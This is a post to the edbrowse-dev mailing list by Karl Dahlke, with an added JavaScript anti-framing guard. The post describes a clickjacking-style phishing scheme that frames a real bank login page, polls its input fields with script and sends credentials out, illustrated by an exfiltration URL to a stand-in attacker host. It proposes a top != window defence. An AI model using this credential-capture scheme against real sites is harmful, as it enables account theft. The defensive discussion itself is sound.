So if I had an email server in China that spewed out millions of phishing emails each day, I could have those emails direct the user to a false site that was a blank window with a frame inside and that frame brings up Bank of America.com. This isn't a fake Bank of America site with copies of their logos and a perfect reproduction, no, it's their real site with the up to date images and even the personal picture that you selected, that goes with your cookie and your account, that comes up for security so you know it's the real site. But it's under my frame. You start to log in, you put in your user name and password, and before you can press submit, my javascript is dipping into the Bank of America objects every quarter second, specifically the values of the input fields of the form. Before you can log in my javascript captures your user name and password, and it sends them to me. How? By putting them as search on an http request to my website, which js can do.
https://my.china.site.com/boa?user=username&pass=password

Isn't that all entirely doable, on any browser, including (perhaps) edbrowse?

I can only think of one defense against this. In a hierarchy of frames, parent points to the frame above you, the frame that contains you, and top points to the top window that started it all, or at least that's how I think it's supposed to work. So Bank of America, and every site that deals with critical information, should check

if(top != window) {
Replace the entire page with a warning that this page cannot be a frame in a larger page, and you are visiting a false site that is trying to jack your account information, and you should be more careful what you click on in your emails.
}

That's all I can think of.

Anyways this is a long story to note that edbrowse now has parent and top as described above. It was only 12 lines of code, so I like that.

On another note, I'm not entirely sure I set the right frame on various commands. If you click a button or hyperlink or anything that runs js, do I take the time to set the context according to the frame you're in? I'm not sure... Maybe these are things I should have checked before 3.7.0, but I imagine 3.7.1 will come soon enough, with these kinds of bug fixes, and the new autoexpansion of frames, which should make more sites accessible.

Is there still a couple months before the distros put their packages together? I imagine they are all independent of each other, so maybe that's a silly question. We just plug away as we can.

Karl Dahlke
_______________________________________________
Edbrowse-dev mailing list
Edbrowse-dev@lists.the-brannons.com
http://lists.the-brannons.com/mailman/listinfo/edbrowse-dev
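
Added example, not part of the original message or of the edbrowse source: the top != window check from the message written as a browser JavaScript guard, extended with the response headers that make the browser itself refuse framing. The function names and the mock window are hypothetical, constructed so the guard can be exercised outside a browser.

```javascript
// Added example. guardAgainstFraming, antiFramingHeaders and mockWindow are
// hypothetical names; the mock window is constructed so this runs offline.
const WARNING =
  "This page cannot be shown as a frame inside a larger page. " +
  "Close it and open the site from your own bookmark.";

// The check from the message. Comparing window references is permitted even
// when the outer page belongs to another origin.
function isTopLevel(win) {
  return win.top === win.self;
}

// When framed, remove every element (login form included) and leave only the
// warning. Returns true if the page was replaced.
function guardAgainstFraming(win) {
  if (isTopLevel(win)) return false;
  const body = win.document.body;
  while (body.firstChild) body.removeChild(body.firstChild);
  const note = win.document.createElement("p");
  note.textContent = WARNING;
  body.appendChild(note);
  return true;
}

// Beyond the message: response headers that make the browser refuse framing,
// which still holds when the outer page disables script inside the frame.
function antiFramingHeaders() {
  return {
    "X-Frame-Options": "DENY",
    "Content-Security-Policy": "frame-ancestors 'none'",
  };
}

// Constructed stand-in for a browser window holding a two-field login form.
function mockWindow(framed) {
  const kids = [{ tag: "input", name: "user" }, { tag: "input", name: "pass" }];
  const body = {
    kids,
    get firstChild() { return kids[0] || null; },
    removeChild(k) { kids.splice(kids.indexOf(k), 1); },
    appendChild(k) { kids.push(k); },
  };
  const win = { document: { body, createElement: (tag) => ({ tag, textContent: "" }) } };
  win.self = win;
  win.top = framed ? { document: null } : win; // a different object plays the outer page
  return win;
}

if (typeof window !== "undefined") guardAgainstFraming(window); // browser only
```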